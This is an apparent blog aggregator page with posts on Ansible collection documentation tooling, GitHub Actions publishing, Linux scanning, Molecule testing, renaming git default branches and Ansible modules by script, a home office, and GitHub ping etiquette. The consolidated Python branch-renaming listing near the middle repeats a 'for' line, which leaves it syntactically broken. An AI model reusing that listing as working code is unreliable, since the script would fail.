In my recent post about building and publishing documentation for Ansible Collections, I've mentioned that the Ansible Community is currently in the process of making their build tools available as a separate project called antsibull instead of keeping them in the hacking directory of ansible.git. I've also said that I couldn't get the documentation to build with antsibull-docs as it wouldn't support collections yet. Thankfully, Felix Fontein, one of the maintainers of antsibull, pointed out that I was wrong and later versions of antsibull actually have partial collections support. So I went ahead and tried it again. And what should I say? Two bug reports by me and four patches by Felix Fontein later, I can use antsibull-docs to generate the Foreman Ansible Modules documentation! Let's see what's needed instead of the ugly hack in detail. We obviously don't need to clone ansible.git anymore and install its requirements manually. Instead we can just install antsibull (0.17.0 contains all the above patches). We also need Ansible (or ansible-base) 2.10 or newer, which currently only exists as a pre-release. 2.10 is the first version that has an ansible-doc that can list contents of a collection, which antsibull-docs requires to work properly. The current implementation of collections documentation in antsibull-docs requires the collection to be installed as in "Ansible can find it". We had the same requirement before to find the documentation fragments and can just re-use the installation we do for various other build tasks in build/collection and point at it using the ANSIBLE_COLLECTIONS_PATHS environment variable or the collections_paths setting in ansible.cfg1. After that, it's only a matter of passing --use-current to make it pick up installed collections instead of trying to fetch and parse them itself.
Given the main goal of antsibull-docs collection is to build documentation for multiple collections at once, it defaults to placing the generated files into <dest-dir>/collections/<namespace>/<collection>. However, we only build documentation for one collection and thus pass --squash-hierarchy to avoid this longish path and make it generate documentation directly in <dest-dir>. Thanks to Felix for implementing this feature for us! And that's it! We can generate our documentation with a single line now!
antsibull-docs collection --use-current --squash-hierarchy --dest-dir ./build/plugin_docs theforeman.foreman
The PR to switch to antsibull is open for review and I hope to get it merged in soon! Oh and you know what's cool? The documentation is now also available as a preview on ansible.com!

  1. Yes, the paths version of that setting is deprecated in 2.10, but as we support older Ansible versions, we still use it.

20 July 2020

Evgeni Golov: Building and publishing documentation for Ansible Collections

I had a draft of this article for about two months, but never really managed to polish and finalize it, partially due to some nasty hacks needed down the road. Thankfully, one of my wishes was heard and I now had the chance to revisit the post and try a few things out. Sadly, my wish was granted only partially and the result is still not beautiful, but read for yourself ;-) UPDATE: I've published a follow up post on building documentation for Ansible Collections using antsibull, as my wish was now fully granted. As part of my day job, I am maintaining the Foreman Ansible Modules - a collection of modules to interact with Foreman and its plugins (most notably Katello). We've been maintaining this collection (as in set of modules) since 2017, so much longer than collections (as in Ansible Collections) existed, but the introduction of Ansible Collections allowed us to provide a much easier and supported way to distribute the modules to our users. Now users usually want two things: features and documentation. Features are easy, we already have plenty of them. But documentation was a bit cumbersome: we had documentation inside the modules, so you could read it via ansible-doc on the command line if you had the collection installed, but we wanted to provide online readable and versioned documentation too - something the users are used to from the official Ansible documentation.

Building HTML from Ansible modules

Ansible modules contain documentation in the form of YAML blocks documenting the parameters, examples and return values of the module. The Ansible documentation site is built using Sphinx from reStructuredText. As the modules don't contain reStructuredText, Ansible had a tool to generate it from the documentation YAML: build-ansible.py document-plugins. The tool and the accompanying libraries are not part of the Ansible distribution - they just live in the hacking directory.
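To make those "YAML blocks" concrete, here is a minimal, made-up example of what such a documentation block looks like inside a module -- the module name and options are purely illustrative, not taken from the Foreman Ansible Modules:

```python
# Hypothetical Ansible module documentation -- module name and options are
# invented for illustration; real modules follow the same structure.
DOCUMENTATION = '''
module: example_module
short_description: Manage example resources in Foreman
description:
  - Create, update and delete example resources.
options:
  name:
    description: Name of the resource.
    required: true
    type: str
'''

EXAMPLES = '''
- name: Create an example resource
  example_module:
    name: my-resource
'''

RETURN = '''
entity:
  description: The final state of the resource.
  returned: success
  type: dict
'''
```

The documentation build tooling parses these blocks and renders them to reStructuredText for Sphinx.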
To run them we need a git checkout of Ansible and source hacking/env-setup to set PYTHONPATH and a few other variables correctly for Ansible to run directly from that checkout. It would be nice if that'd be a feature of ansible-doc, but while it isn't, we need to have a full Ansible git checkout to be able to continue. The tool has been recently split out into its own repository/distribution: antsibull. However, it was also a bit redesigned to be easier to use (good!), and my hack to abuse it to build documentation for out-of-tree modules doesn't work anymore (bad!). There is an issue open for collections support, so I hope to be able to switch to antsibull soon. Anyways, back to the original hack. As we're using documentation fragments, we need to tell the tool to look for these, because otherwise we'd get errors about fragments not being found. We're passing ANSIBLE_COLLECTIONS_PATHS so that the tool can find the correct, namespaced documentation fragments there. We also need to provide --module-dir pointing at the actual modules we want to build documentation for.
ANSIBLEGIT=/path/to/ansible.git
source ${ANSIBLEGIT}/hacking/env-setup
ANSIBLE_COLLECTIONS_PATHS=../build/collections python3 ${ANSIBLEGIT}/hacking/build-ansible.py document-plugins --module-dir ../plugins/modules --template-dir ./_templates --template-dir ${ANSIBLEGIT}/docs/templates --type rst --output-dir ./modules/
Ideally, when antsibull supports collections, this will become antsibull-docs collection without any need to have an Ansible checkout, source env-setup or pass tons of paths. Until then we have a Makefile that clones Ansible, runs the above command and then calls Sphinx (which provides a nice Makefile for building) to generate HTML from the reStructuredText. You can find our slightly modified templates and themes in our git repository in the docs directory.

Publishing HTML documentation for Ansible Modules

Now that we have a way to build the documentation, let's also automate publishing, because nothing is worse than out-of-date documentation! We're using GitHub and GitHub Actions for that, but you can achieve the same with GitLab, TravisCI or Jenkins. First, we need a trigger. As we want always up-to-date documentation for the main branch where all the development happens and also documentation for all stable releases that are tagged (we use vX.Y.Z for the tags), we can do something like this:
on:
  push:
    tags:
      - v[0-9]+.[0-9]+.[0-9]+
    branches:
      - master
Now that we have a trigger, we define the job steps that get executed:
    steps:
      - name: Check out the code
        uses: actions/checkout@v2
      - name: Set up Python
        uses: actions/setup-python@v2
        with:
          python-version: "3.7"
      - name: Install dependencies
        run: make doc-setup
      - name: Build docs
        run: make doc
At this point we will have the docs built by make doc in the docs/_build/html directory, but not published anywhere yet. As we're using GitHub anyways, we can also use GitHub Pages to host the result.
      - uses: actions/checkout@v2
      - name: configure git
        run: |
          git config user.name "${GITHUB_ACTOR}"
          git config user.email "${GITHUB_ACTOR}@bots.github.com"
          git fetch --no-tags --prune --depth=1 origin +refs/heads/*:refs/remotes/origin/*
      - name: Set up Python
        uses: actions/setup-python@v2
        with:
          python-version: "3.7"
      - name: Install dependencies
        run: make doc-setup
      - name: Build docs
        run: make doc
      - name: commit docs
        run: |
          git checkout gh-pages
          rm -rf $(basename ${GITHUB_REF})
          mv docs/_build/html $(basename ${GITHUB_REF})
          dirname */index.html | sort --version-sort | xargs -I@@ -n1 echo '<div><a href="@@/"><p>@@</p></a></div>' >> index.html
          git add $(basename ${GITHUB_REF}) index.html
          git commit -m "update docs for $(basename ${GITHUB_REF})" || true
      - name: push docs
        run: git push origin gh-pages
As this is not exactly self-explanatory:
  1. Configure git to have a proper author name and email, as otherwise you get ugly history and maybe even failing commits
  2. Fetch all branch names, as the checkout action by default doesn't do this.
  3. Setup Python, Sphinx, Ansible etc.
  4. Build the documentation as described above.
  5. Switch to the gh-pages branch from the commit that triggered the workflow.
  6. Remove any existing documentation for this tag/branch ($GITHUB_REF contains the name which triggered the workflow) if it exists already.
  7. Move the previously built documentation from the Sphinx output directory to a directory named after the current target.
  8. Generate a simple index of all available documentation versions.
  9. Commit all changes, but don't fail if there is nothing to commit.
  10. Push to the gh-pages branch which will trigger a GitHub Pages deployment.
Pretty sure this won't win any beauty contest for scripting and automation, but it gets the job done and nobody on the team has to remember to update the documentation anymore. You can see the results on theforeman.org or directly on GitHub.

15 July 2020

Evgeni Golov: Scanning with a Brother MFC-L2720DW on Linux without any binary blobs

Back in 2015, I got a Brother MFC-L2720DW for the casual "I need to print those two pages" and "I need to scan these receipts" at home (and home-office ;)). It's a rather cheap (I paid less than 200 € in 2015) monochrome laser printer, scanner and fax with a (well, two, wired and wireless) network interface. In those five years I've never used the fax or WiFi functions, but printed and scanned a few pages. Brother offers Linux drivers, but those are binary blobs which I never really liked to run. The printer part works just fine with a "Generic PCL 6/PCL XL" driver in CUPS or even "driverless" via AirPrint on Linux. You can also feed it plain PostScript, but I found it rather slow compared to PCL. On recent Androids it works using the built-in printer service or Mopria Print Service for older ones - I used to joke "why would you need a printer on your phone?!", but found it quite useful after a few tries. However, for the scanner part I had to use Brother's brscan4 driver on Linux and their iPrint&Scan app on Android - Mopria Scan wouldn't support it. Until, last Friday, I saw a NEW package being uploaded to Debian: sane-airscan. And yes, monitoring the Debian NEW queue via Twitter is totally legit! sane-airscan is an implementation of Apple's AirScan (eSCL) and Microsoft's WSD/WS-Scan protocols for SANE. I've never heard of those before - only about AirPrint, but thankfully this does not mean nobody has reverse-engineered them and created something that works beautifully on Linux. As of today there are no packages in the official Fedora repositories and the Debian ones are still in NEW, however the upstream documentation refers to an openSUSE OBS repository that works like a charm in the meantime (on Fedora 32). The only drawback I've seen so far: the scanner only works in "Color" mode and there is no way to scan in "Grayscale", making scanning a tad slower.
This has been reported upstream and might or might not be fixable, as it seems the device does not announce any mode besides "Color". Interestingly, SANE has an eSCL backend of its own since 1.0.29, but it's disabled in Fedora in favor of sane-airscan even though the latter isn't available in Fedora yet. However, it might not even need separate packaging, as SANE upstream is planning to integrate it into sane-backends directly.

12 July 2020

Evgeni Golov: Using Ansible Molecule to test roles in monorepos

Ansible Molecule is a toolkit for testing Ansible roles. It allows for easy execution and verification of your roles and also manages the environment (container, VM, etc.) in which those are executed. In the Foreman project we have a collection of Ansible roles to setup Foreman instances called forklift. The roles vary from configuring Libvirt and Vagrant for our CI to deploying full-fledged Foreman and Katello setups with Proxies and everything. The repository also contains a dynamic Vagrantfile that can generate Foreman and Katello installations on all supported Debian, Ubuntu and CentOS platforms using the previously mentioned roles. This feature is super helpful when you need to debug something specific to an OS/version combination. Up until recently, all those roles didn't have any tests. We would run ansible-lint on them, but that was it. As I am planning to do some heavier work on some of the roles to enhance our upgrade testing, I decided to add some tests first. Using Molecule, of course. Adding Molecule to an existing role is easy: molecule init scenario -r my-role-name will add all the necessary files/examples for you. It's left as an exercise to the reader how to actually test the role properly as this is not what this post is about. Executing the tests with Molecule is also easy: molecule test. And there are also examples how to integrate the test execution with the common CI systems. But what happens if you have more than one role in the repository? Molecule has support for monorepos, however, that is rather limited: it will detect the role path correctly, so roles can depend on other roles from the same repository, but it won't find and execute tests for roles if you run it from the repository root. There is an undocumented way to set MOLECULE_GLOB so that Molecule would detect test scenarios in different paths, but I couldn't get it to work nicely for executing tests of multiple roles and upstream currently does not plan to implement this.
Well, bash to the rescue!
for roledir in roles/*/molecule; do
    pushd $(dirname $roledir)
    molecule test
    popd
done
Add that to your CI and be happy! The CI will execute all available tests and you can still execute those for the role you're hacking on by just calling molecule test as you're used to. However, we can do even better. When you initialize a role with Molecule or add Molecule to an existing role, quite a lot of files are added in the molecule directory, plus a yamllint configuration in the role root. If you have many roles, you will notice that especially the molecule.yml and .yamllint files look very similar for each role. It would be much nicer if we could keep those in a shared place. Molecule supports a "base config": a configuration file that gets merged with the molecule.yml of your project. By default, that's ~/.config/molecule/config.yml, but Molecule will actually look for a .config/molecule/config.yml in two places: the root of the VCS repository and your HOME. And guess what? The one in the repository wins (that's not yet well documented). So by adding a .config/molecule/config.yml to the repository, we can place all shared configuration there and don't have to duplicate it in every role. And that .yamllint file? We can also move that to the repository root and add the following to Molecule's (now shared) configuration:
lint: yamllint --config-file ${MOLECULE_PROJECT_DIRECTORY}/../../.yamllint --format parsable .
This will define the lint action as calling yamllint with the configuration stored in the repository root instead of the project directory, assuming you store your roles as roles/<rolename>/ in the repository. And that's it. We now have a central place for our Molecule and yamllint configurations and only need to place role-specific data into the role directory.
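For illustration, such a shared .config/molecule/config.yml could look like the sketch below -- the driver and image are assumptions for the example, not necessarily what forklift actually uses:

```yaml
# .config/molecule/config.yml -- sketch of a shared base config;
# driver and image are assumptions, adjust to your environment
driver:
  name: docker
platforms:
  - name: instance
    image: centos:8
lint: |
  yamllint --config-file ${MOLECULE_PROJECT_DIRECTORY}/../../.yamllint --format parsable .
```

Each role's own molecule.yml then only needs to carry whatever deviates from this shared base, as Molecule merges the two at runtime.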

2 July 2020

Evgeni Golov: Automatically renaming the default git branch to "devel"

It seems GitHub is planning to rename the default branch for newly created repositories from "master" to "main". It's incredible how much positive PR you can get with a one line configuration change, while still working together with the ICE. However, this post is not about bashing GitHub. Changing the default branch for newly created repositories is good. And you also should do that for the ones you create with git init locally. But what about all the repositories out there? GitHub surely won't force-rename those branches, but we can! Ian will do this as he touches the individual repositories, but I tend to forget things unless I do them immediately. Oh, so this is another "automate everything with an API" post? Yes, yes it is! And yes, I am going to use GitHub here, but something similar should be implementable on any git hosting platform that has an API. Of course, if you have SSH access to the repositories, you can also just edit HEAD in a for loop in bash, but that would be boring ;-) I'm going with devel btw, as I'm already used to develop in the Foreman project and devel in Ansible.

acquire credentials

My GitHub account is 2FA enabled, so I can't just use my username and password in a basic HTTP API client. So the first step is to acquire a personal access token that can be used instead. Of course I could also have implemented OAuth2 in my lousy script, but ain't nobody got time for that. The token will require the "repo" permission to be able to change repositories. And we'll need some boilerplate code (I'm using Python3 and requests, but anything else will work too):
#!/usr/bin/env python3
import requests
BASE='https://api.github.com'
USER='evgeni'
TOKEN='abcdef'
headers = {'User-Agent': '@{}'.format(USER)}
auth = (USER, TOKEN)
session = requests.Session()
session.auth = auth
session.headers.update(headers)
session.verify = True
This will store our username and token, and create a requests.Session so that we don't have to pass the same data all the time.

get a list of repositories to change

I want to change all my own repos that are not archived, not forks, and actually have the default branch set to master, YMMV. As we're authenticated, we can just list the repositories of the currently authenticated user, and limit them to "owner" only. GitHub uses pagination for their API, so we'll have to loop until we get to the end of the repository list.
repos_to_change = []
url = '{}/user/repos?type=owner'.format(BASE)
while url:
    r = session.get(url)
    if r.ok:
        repos = r.json()
        for repo in repos:
            if not repo['archived'] and not repo['fork'] and repo['default_branch'] == 'master':
                repos_to_change.append(repo['name'])
        if 'next' in r.links:
            url = r.links['next']['url']
        else:
            url = None
    else:
        url = None
create a new devel branch and mark it as default

Now that we know which repos to change, we need to fetch the SHA of the current master, create a new devel branch pointing at the same commit and then set that new branch as the default branch.
for repo in repos_to_change:
    master_data = session.get('{}/repos/evgeni/{}/git/ref/heads/master'.format(BASE, repo)).json()
    data = {'ref': 'refs/heads/devel', 'sha': master_data['object']['sha']}
    session.post('{}/repos/{}/{}/git/refs'.format(BASE, USER, repo), json=data)
    default_branch_data = {'default_branch': 'devel'}
    session.patch('{}/repos/{}/{}'.format(BASE, USER, repo), json=default_branch_data)
    session.delete('{}/repos/{}/{}/git/refs/heads/{}'.format(BASE, USER, repo, 'master'))
I've also opted in to actually delete the old master, as I think that's the safest way to let the users know that it's gone. Letting it rot in the repository would mean people can still pull and won't notice that there are no changes anymore as the default branch moved to devel.

announcement

I've updated all my (those in the evgeni namespace) non-archived repositories to have devel instead of master as the default branch. Have fun updating!

code
#!/usr/bin/env python3
import requests
BASE='https://api.github.com'
USER='evgeni'
TOKEN='abcd'
headers = {'User-Agent': '@{}'.format(USER)}
auth = (USER, TOKEN)
session = requests.Session()
session.auth = auth
session.headers.update(headers)
session.verify = True
repos_to_change = []
url = '{}/user/repos?type=owner'.format(BASE)
while url:
    r = session.get(url)
    if r.ok:
        repos = r.json()
        for repo in repos:
            if not repo['archived'] and not repo['fork'] and repo['default_branch'] == 'master':
                repos_to_change.append(repo['name'])
        if 'next' in r.links:
            url = r.links['next']['url']
        else:
            url = None
    else:
        url = None
for repo in repos_to_change:
for repo in repos_to_change:
    master_data = session.get('{}/repos/evgeni/{}/git/ref/heads/master'.format(BASE, repo)).json()
    data = {'ref': 'refs/heads/devel', 'sha': master_data['object']['sha']}
    session.post('{}/repos/{}/{}/git/refs'.format(BASE, USER, repo), json=data)
    default_branch_data = {'default_branch': 'devel'}
    session.patch('{}/repos/{}/{}'.format(BASE, USER, repo), json=default_branch_data)
    session.delete('{}/repos/{}/{}/git/refs/heads/{}'.format(BASE, USER, repo, 'master'))

26 June 2020

Jonathan Dowland: Our Study

This is a fairly self-indulgent post, sorry! Encouraged by Evgeni, Michael and others, given I'm spending a lot more time at my desk in my home office, here's a picture of it:
Fisheye shot of my home office
Near enough everything in the study is a work in progress. The KALLAX behind my desk is a recent addition (under duress) because we have nowhere else to put it. Sadly I can't see it going away any time soon. On the up-side, since Christmas I've had my record player and collection in and on top of it, so I can listen to records whilst working. The arm chair is a recent move from another room. It's a nice place to take some work calls, serving as a change of scene, and I hope to add a reading light sometime. The desk chair is some Ikea model I can't recall, which is sufficient, and just fits into the desk cavity. (I'm fairly sure my Aeron, inaccessible elsewhere, would not fit.) I've had this old mahogany, leather-topped desk since I was a teenager and it's a blessing and a curse. Mostly a blessing: It's a lovely big desk. The main drawback is it's very much not height adjustable. At the back is a custom made, full-width monitor stand/shelf, a recent gift produced to specification by my Dad, a retired carpenter. On the top: my work Thinkpad T470s laptop, geared more towards portable than powerful (my normal preference), although for the foreseeable future it's going to remain in the exact same place; an Ikea desk lamp (I can't recall the model); a 27" 4K LG monitor, the cheapest such I could find when I bought it; an old LCD Analog TV, fantastic for vintage consoles and the like. Underneath: An Alesis Micron 2 octave analog-modelling synthesizer; various hubs and similar things; My Amiga 500. Like Evgeni, my normal keyboard is a ThinkPad Compact USB Keyboard with TrackPoint. I've been using different generations of these styles of keyboards for a long time now, initially because I loved the trackpoint pointer. I'm very curious about trying out mechanical keyboards, as I have very fond memories of my first IBM Model M buckled-spring keyboard, but I haven't dipped my toes into that money-trap just yet. The Thinkpad keyboard is rubber-dome, but it's a good one.
Wedged between the right-hand bookcases is a stack of IT-related things: new printer; deprecated printer; old/spare/play laptops, docks and chargers; managed network switch; NAS.

22 June 2020

Evgeni Golov: mass-migrating modules inside an Ansible Collection

In the Foreman project, we've been maintaining a collection of Ansible modules to manage Foreman installations since 2017. That is, two years before Ansible had the concept of collections at all. For that you had to set library (and later module_utils and doc_fragment_plugins) in ansible.cfg and effectively inject our modules, their helpers and documentation fragments into the main Ansible namespace. Not the cleanest solution, but it worked quite well for us. When Ansible started introducing collections, we quickly joined, as the idea of namespaced, easily distributable and usable content units was great and exactly matched what we had in mind. However, collections are only usable in Ansible 2.8, or really 2.9: while 2.8 can consume them, the tooling around building and installing them is lacking. Because of that we've been keeping our modules usable outside of a collection. Until recently, when we decided it was time to move on, drop that compatibility (which cost us a few headaches over time) and release a shiny 1.0.0. One of the changes we wanted for 1.0.0 was renaming a few modules. Historically we had the module names prefixed with foreman_ and katello_, depending on whether they were designed to work with Foreman (and plugins) or Katello (which is technically a Foreman plugin, but has a way more complicated deployment and currently can't be easily added to an existing Foreman setup). This made sense as long as we were injecting into the main Ansible namespace, but with collections the names became theforeman.foreman.foreman_<something>, and while we all love Foreman, that was a bit too much. So we wanted to drop that prefix. And while at it, also change some other names (like ptable, which became partition_table) to be more readable. But how? There is no tooling that would rename all files accordingly and adjust examples and tests. Well, bash to the rescue! I'm usually not a big fan of bash scripts, but renaming files, searching and replacing strings?
That perfectly fits! First of all we need a way to map the old name to the new name. In most cases it's just "drop the prefix"; for the others you can have some if/elif/fi:
prefixless_name=$(echo ${old_name} | sed -E 's/^(foreman|katello)_//')
if [[ ${old_name} == 'foreman_environment' ]]; then
  new_name='puppet_environment'
elif [[ ${old_name} == 'katello_sync' ]]; then
  new_name='repository_sync'
elif [[ ${old_name} == 'katello_upload' ]]; then
  new_name='content_upload'
elif [[ ${old_name} == 'foreman_ptable' ]]; then
  new_name='partition_table'
elif [[ ${old_name} == 'foreman_search_facts' ]]; then
  new_name='resource_info'
elif [[ ${old_name} == 'katello_manifest' ]]; then
  new_name='subscription_manifest'
elif [[ ${old_name} == 'foreman_model' ]]; then
  new_name='hardware_model'
else
  new_name=${prefixless_name}
fi
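As an aside, the same special-case mapping could also be written as a Bash 4+ associative array with the prefix-drop as the fallback. This is a sketch of that alternative, not code from the post; the map_name helper is hypothetical:

```shell
#!/bin/bash
# Hypothetical alternative to the if/elif chain: a Bash 4+ associative array
# holding the special cases, falling back to dropping the foreman_/katello_ prefix.
declare -A SPECIAL_NAMES=(
  [foreman_environment]=puppet_environment
  [katello_sync]=repository_sync
  [katello_upload]=content_upload
  [foreman_ptable]=partition_table
  [foreman_search_facts]=resource_info
  [katello_manifest]=subscription_manifest
  [foreman_model]=hardware_model
)

map_name() {
  local old_name=$1
  if [[ -n "${SPECIAL_NAMES[$old_name]:-}" ]]; then
    # explicit special case wins
    echo "${SPECIAL_NAMES[$old_name]}"
  else
    # default: just drop the prefix
    echo "${old_name}" | sed -E 's/^(foreman|katello)_//'
  fi
}

map_name foreman_ptable   # partition_table
map_name katello_product  # product
```

Whether that is nicer than the if/elif chain is a matter of taste; it does keep the mapping data separate from the control flow.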
That defined, we need to actually have an ${old_name}. Well, that's a for loop over the modules, right?
for module in ${BASE}/foreman_*py ${BASE}/katello_*py; do
  old_name=$(basename ${module} .py)
  …
done
While we're looping over files, let's rename them and all the files that are associated with the module:
# rename the module
git mv ${BASE}/${old_name}.py ${BASE}/${new_name}.py
# rename the tests and test fixtures
git mv ${TESTS}/${old_name}.yml ${TESTS}/${new_name}.yml
git mv tests/fixtures/apidoc/${old_name}.json tests/fixtures/apidoc/${new_name}.json
for testfile in ${TESTS}/fixtures/${old_name}-*.yml; do
  git mv ${testfile} $(echo ${testfile} | sed "s/${old_name}/${new_name}/")
done
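To see what the sed inside that fixture loop actually produces, here is a throwaway illustration on a made-up fixture filename (no git repository needed; the filename is hypothetical):

```shell
#!/bin/bash
# Illustration only: the filename substitution used in the fixture-rename loop,
# applied to one hypothetical fixture file.
old_name=foreman_ptable
new_name=partition_table
testfile="tests/test_playbooks/fixtures/${old_name}-create.yml"
echo ${testfile} | sed "s/${old_name}/${new_name}/"
# prints tests/test_playbooks/fixtures/partition_table-create.yml
```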
Now comes the really tricky part: search and replace. Let's see where we need to replace first:
  1. in the module file
    1. module key of the DOCUMENTATION stanza (e.g. module: foreman_example)
    2. all examples (e.g. foreman_example: )
  2. in all test playbooks (e.g. foreman_example: )
  3. in pytest's conftest.py and other files related to test execution
  4. in documentation
sed -E -i "/^(\s+${old_name}|module):/ s/${old_name}/${new_name}/g" ${BASE}/*.py
sed -E -i "/^(\s+${old_name}|module):/ s/${old_name}/${new_name}/g" tests/test_playbooks/tasks/*.yml tests/test_playbooks/*.yml
sed -E -i "/'${old_name}'/ s/${old_name}/${new_name}/" tests/conftest.py tests/test_crud.py
sed -E -i "/ ${old_name} / s/${old_name}/${new_name}/g" README.md docs/*.md
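A quick sanity check of the first address pattern on a scratch file shows how it limits the replacement to `module:` keys and indented task names while leaving prose alone. Note this assumes GNU sed, since \s and suffix-less -i are GNU extensions; the sample YAML content is made up:

```shell
#!/bin/bash
# Throwaway check of the DOCUMENTATION/playbook sed pattern (GNU sed assumed).
old_name=foreman_ptable
new_name=partition_table
scratch=$(mktemp)
cat > "${scratch}" <<'EOF'
module: foreman_ptable
- name: create a partition table
  foreman_ptable:
    name: test
# prose mentioning foreman_ptable stays untouched
EOF
# only lines starting with whitespace+name or with "module" get rewritten
sed -E -i "/^(\s+${old_name}|module):/ s/${old_name}/${new_name}/g" "${scratch}"
cat "${scratch}"
rm -f "${scratch}"
```

The `module:` line and the indented `foreman_ptable:` task become `partition_table`, while the comment keeps the old name.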
You've probably noticed I used ${BASE} and ${TESTS} and never defined them. Lazy me. But here is the full script, defining the variables and looping over all the modules.
#!/bin/bash

BASE=plugins/modules
TESTS=tests/test_playbooks
RUNTIME=meta/runtime.yml

echo "plugin_routing:" > ${RUNTIME}
echo "  modules:" >> ${RUNTIME}

for module in ${BASE}/foreman_*py ${BASE}/katello_*py; do
  old_name=$(basename ${module} .py)
  prefixless_name=$(echo ${old_name} | sed -E 's/^(foreman|katello)_//')
  if [[ ${old_name} == 'foreman_environment' ]]; then
    new_name='puppet_environment'
  elif [[ ${old_name} == 'katello_sync' ]]; then
    new_name='repository_sync'
  elif [[ ${old_name} == 'katello_upload' ]]; then
    new_name='content_upload'
  elif [[ ${old_name} == 'foreman_ptable' ]]; then
    new_name='partition_table'
  elif [[ ${old_name} == 'foreman_search_facts' ]]; then
    new_name='resource_info'
  elif [[ ${old_name} == 'katello_manifest' ]]; then
    new_name='subscription_manifest'
  elif [[ ${old_name} == 'foreman_model' ]]; then
    new_name='hardware_model'
  else
    new_name=${prefixless_name}
  fi

  echo "renaming ${old_name} to ${new_name}"

  git mv ${BASE}/${old_name}.py ${BASE}/${new_name}.py
  git mv ${TESTS}/${old_name}.yml ${TESTS}/${new_name}.yml
  git mv tests/fixtures/apidoc/${old_name}.json tests/fixtures/apidoc/${new_name}.json
  for testfile in ${TESTS}/fixtures/${old_name}-*.yml; do
    git mv ${testfile} $(echo ${testfile} | sed "s/${old_name}/${new_name}/")
  done

  sed -E -i "/^(\s+${old_name}|module):/ s/${old_name}/${new_name}/g" ${BASE}/*.py
  sed -E -i "/^(\s+${old_name}|module):/ s/${old_name}/${new_name}/g" tests/test_playbooks/tasks/*.yml tests/test_playbooks/*.yml
  sed -E -i "/'${old_name}'/ s/${old_name}/${new_name}/" tests/conftest.py tests/test_crud.py
  sed -E -i "/ ${old_name} / s/${old_name}/${new_name}/g" README.md docs/*.md

  echo "    ${old_name}:" >> ${RUNTIME}
  echo "      redirect: ${new_name}" >> ${RUNTIME}

  git commit -m "rename ${old_name} to ${new_name}" ${BASE} tests/ README.md docs/ ${RUNTIME}
done
As a bonus, the script will also generate a meta/runtime.yml which can be used by Ansible 2.10+ to automatically use the new module names if the playbook contains the old ones. Oh, and yes, this is probably not the nicest script you'll read this year. Maybe not even today. But it got the job nicely done and I don't intend to need it again anyways.
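For illustration, this is the shape of the plugin_routing entries the script's echo calls append for a single rename; the foreman_ptable example is mine, built here into a temporary file instead of meta/runtime.yml:

```shell
#!/bin/bash
# Illustration: the plugin_routing fragment emitted for one rename
# (foreman_ptable -> partition_table), using the same echo approach as the script.
RUNTIME=$(mktemp)
echo "plugin_routing:" > ${RUNTIME}
echo "  modules:" >> ${RUNTIME}
echo "    foreman_ptable:" >> ${RUNTIME}
echo "      redirect: partition_table" >> ${RUNTIME}
cat ${RUNTIME}
rm -f ${RUNTIME}
```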

14 June 2020

Evgeni Golov: naked pings 2020

ajax' post about "ping" etiquette is over 10 years old, but holds true to this day. So true that my IRC client at work has a script that will reply with a link to it each time I get a naked ping. But IRC is not the only means of communication. There is also mail, (video) conferencing, and GitHub/GitLab. Well, at least in the software engineering context. Oh and yes, it's 2020 and I still (proudly) have no Slack account. Thankfully, (naked) pings are not really a thing for mail or conferencing, but I see an increasing amount of them on GitHub and it bothers me, a lot. As there is no direct messaging on GitHub, you might rightfully ask why, as there is always context in the form of the issue or PR the ping happened in, so lean back and listen ;-)

notifications become useless

While there might be context in the issue/PR, there is none (besides the title) in the notification mail, and not even the title in the notification from the Android app (which I have installed as I use it a lot for smaller reviews). So the ping will always force a full context switch to open the web view of the issue in question, removing the possibility to just swipe away the notification/mail as "not important right now".

even some context is not enough context

Even after visiting the issue/PR, the ping quite often remains non-actionable. Do you want me to debug/fix the issue? Review the PR? Merge it? Close it? I don't know! The only actionable ping is when the previous message is directed at me and has an actionable request in it, and the ping is just a reminder that I have to do it. And even then, why not write "hey @evgeni, did you have time to process my last question?" or something similar? BTW, this is also what I dislike about ajax' minimal example "ping re bz 534027" - what am I supposed to do with that BZ?!

why me anyways?!

Unless I am the only maintainer of a repo or the author of the issue/PR, there is usually no reason to ping me directly.
I might be sick, or on holiday, or currently not working on that particular repo/topic, or whatever. Any of that will result in you thinking that your request will be prioritized, while in reality it won't. Even worse, somebody might come across it, see me mentioned and think "ok, that's Evgeni's playground, I'll look elsewhere". Most organizations have groups of people working on specific topics. If you know the group name and have enough permissions (I am not exactly sure which, just that GitHub has limits to avoid spam, sorry) you can ping @organization/group and everyone in that group will get a notification. That's far from perfect, but at least this will get the attention of the right people. Sometimes there is also a bot that will either automatically ping a group of people or that you can trigger to do so. Oh, and I'm getting paid for work on open source. So if you end up pinging me in a work-related repository, there is a high chance I will only process that during work hours, while another co-worker might have been available to help you out almost immediately.

be patient

Unless we talked on another medium before and I am waiting for it, please don't ping directly after creation of the issue/PR. Maintainers get notifications about new stuff and will triage and process it at some point.

conclusion

If you feel called out, please don't take it personally. Instead, please try to provide as much actionable information as possible and be patient; that's the best way to get a high quality result. I will ignore pings where I don't immediately know what to do, and so should you.

one more thing

Oh, and if you ping me on IRC, with context, and then disconnect before I can respond… In the past you would sometimes get a reply by mail. These days the request will most probably be ignored. I don't like talking to the void. Sorry.
